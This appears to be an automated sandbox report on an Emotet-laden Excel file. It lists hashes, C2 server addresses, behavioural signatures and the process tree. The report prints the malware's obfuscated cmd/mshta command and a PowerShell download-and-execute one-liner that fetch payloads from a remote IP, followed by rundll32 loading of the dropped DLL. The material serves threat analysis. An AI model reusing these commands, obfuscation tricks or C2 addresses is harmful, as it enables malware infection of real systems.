Analysis

  • max time kernel
    124s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 00:44

General

  • Target

    Data 2801.xls

  • Size

    36KB

  • MD5

    ba3893929ffe3930a9b3352dc0a84089

  • SHA1

    0f263d18804644f804093130001f9b315d6223ac

  • SHA256

    17d890cb97a2f9cf9919ab6679578e610b079458580d7b625314641a4c1d4180

  • SHA512

    abad39ee818d8ed6d4a4cc709a36aa5913079c332e5782f750048e824c58c1d39fb533ccb0e2ef4c49e8ed9d3d4ce842481235951ee52bc22f8fcd24ffc5ee4f

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/oo/aa/se.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/oo/aa/se.png

Extracted

Family

emotet

Botnet

Epoch5

C2

159.69.43.124:8080

45.79.80.198:443

207.148.81.119:8080

128.199.192.135:8080

118.98.72.86:443

217.182.143.207:443

168.197.250.14:80

116.124.128.206:8080

78.46.73.125:443

185.148.168.15:8080

195.154.146.35:443

85.214.67.203:8080

194.9.172.107:8080

59.148.253.194:443

210.57.209.142:8080

54.38.242.185:443

195.77.239.39:8080

159.69.237.188:443

104.131.62.48:8080

62.171.178.147:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Data 2801.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:660
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1644
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/oo/aa/se.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:1284
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/oo/aa/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3808
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2224
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3056
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:824
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Dixekuo\plzmdrqpe.tkw",jsOTzilh
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:820
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Dixekuo\plzmdrqpe.tkw",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1708
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1284 -s 2252
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1280

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    d7653fa9b638f6d41d1f76ed3025a875

    SHA1

    f6207008ab3abf05e7b99d5c43d39abd4823fa35

    SHA256

    1d32000ec966eefc949fcc8a3e7bac4954a19c08f18b340a41f8f3ee27b8447e

    SHA512

    393bfb905c740e4ed690a4951c4ad357cea5817ae5f1b99fb811031e0af20b9b3f94984b840ddc8e8fda502e9d2fcab8bf7806581399c7ee3d8092354b1eaa10

  • \ProgramData\QWER.dll
    MD5

    d7653fa9b638f6d41d1f76ed3025a875

    SHA1

    f6207008ab3abf05e7b99d5c43d39abd4823fa35

    SHA256

    1d32000ec966eefc949fcc8a3e7bac4954a19c08f18b340a41f8f3ee27b8447e

    SHA512

    393bfb905c740e4ed690a4951c4ad357cea5817ae5f1b99fb811031e0af20b9b3f94984b840ddc8e8fda502e9d2fcab8bf7806581399c7ee3d8092354b1eaa10

  • \ProgramData\QWER.dll
    MD5

    d7653fa9b638f6d41d1f76ed3025a875

    SHA1

    f6207008ab3abf05e7b99d5c43d39abd4823fa35

    SHA256

    1d32000ec966eefc949fcc8a3e7bac4954a19c08f18b340a41f8f3ee27b8447e

    SHA512

    393bfb905c740e4ed690a4951c4ad357cea5817ae5f1b99fb811031e0af20b9b3f94984b840ddc8e8fda502e9d2fcab8bf7806581399c7ee3d8092354b1eaa10

  • memory/660-129-0x00007FF86F1F0000-0x00007FF86F200000-memory.dmp
    Filesize

    64KB

  • memory/660-119-0x00007FF8726E0000-0x00007FF8726F0000-memory.dmp
    Filesize

    64KB

  • memory/660-128-0x00007FF86F1F0000-0x00007FF86F200000-memory.dmp
    Filesize

    64KB

  • memory/660-118-0x00007FF8726E0000-0x00007FF8726F0000-memory.dmp
    Filesize

    64KB

  • memory/660-391-0x00007FF8726E0000-0x00007FF8726F0000-memory.dmp
    Filesize

    64KB

  • memory/660-390-0x00007FF8726E0000-0x00007FF8726F0000-memory.dmp
    Filesize

    64KB

  • memory/660-389-0x00007FF8726E0000-0x00007FF8726F0000-memory.dmp
    Filesize

    64KB

  • memory/660-388-0x00007FF8726E0000-0x00007FF8726F0000-memory.dmp
    Filesize

    64KB

  • memory/660-115-0x00007FF8726E0000-0x00007FF8726F0000-memory.dmp
    Filesize

    64KB

  • memory/660-117-0x00007FF8726E0000-0x00007FF8726F0000-memory.dmp
    Filesize

    64KB

  • memory/660-116-0x00007FF8726E0000-0x00007FF8726F0000-memory.dmp
    Filesize

    64KB

  • memory/820-349-0x00000000029D0000-0x00000000029F7000-memory.dmp
    Filesize

    156KB

  • memory/824-351-0x0000000004C70000-0x0000000004C97000-memory.dmp
    Filesize

    156KB

  • memory/824-347-0x0000000004AF0000-0x0000000004B17000-memory.dmp
    Filesize

    156KB

  • memory/824-336-0x0000000004230000-0x0000000004257000-memory.dmp
    Filesize

    156KB

  • memory/824-339-0x0000000004840000-0x0000000004867000-memory.dmp
    Filesize

    156KB

  • memory/824-341-0x0000000004950000-0x0000000004977000-memory.dmp
    Filesize

    156KB

  • memory/824-343-0x0000000004A30000-0x0000000004A57000-memory.dmp
    Filesize

    156KB

  • memory/824-345-0x0000000004A90000-0x0000000004AB7000-memory.dmp
    Filesize

    156KB

  • memory/1708-359-0x0000000005580000-0x00000000055A7000-memory.dmp
    Filesize

    156KB

  • memory/1708-352-0x0000000004C50000-0x0000000004C77000-memory.dmp
    Filesize

    156KB

  • memory/1708-355-0x00000000053C0000-0x00000000053E7000-memory.dmp
    Filesize

    156KB

  • memory/1708-357-0x00000000054A0000-0x00000000054C7000-memory.dmp
    Filesize

    156KB

  • memory/1708-361-0x0000000005660000-0x0000000005687000-memory.dmp
    Filesize

    156KB

  • memory/1708-363-0x0000000005750000-0x0000000005777000-memory.dmp
    Filesize

    156KB

  • memory/3056-334-0x0000000004870000-0x0000000004897000-memory.dmp
    Filesize

    156KB

  • memory/3808-312-0x000001E2FA0A6000-0x000001E2FA0A8000-memory.dmp
    Filesize

    8KB

  • memory/3808-307-0x000001E2FA850000-0x000001E2FA8C6000-memory.dmp
    Filesize

    472KB

  • memory/3808-296-0x000001E2FA2B0000-0x000001E2FA2EC000-memory.dmp
    Filesize

    240KB

  • memory/3808-295-0x000001E2FA0A3000-0x000001E2FA0A5000-memory.dmp
    Filesize

    8KB

  • memory/3808-276-0x000001E2FA000000-0x000001E2FA022000-memory.dmp
    Filesize

    136KB

  • memory/3808-274-0x000001E2FA0A0000-0x000001E2FA0A2000-memory.dmp
    Filesize

    8KB